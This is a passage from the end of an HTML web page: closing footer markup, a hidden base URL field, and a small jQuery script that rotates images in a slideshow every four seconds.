                    </div>
                </div>
            </li>
        </ul>
    </nav>
</footer>
<input id="base_url" type="hidden" value="/">

<script type="text/javascript">
    $(function() {
        var imgs = $("#slideshow > li");
        var imgLen = imgs.length;
        var count = 0;
        function changeImg() {
            count = (count + 1) % imgLen;
            imgs.removeClass("showSlide").eq(count).addClass("showSlide");
        }
        setInterval(changeImg, 4000);
    })
</script>
</html>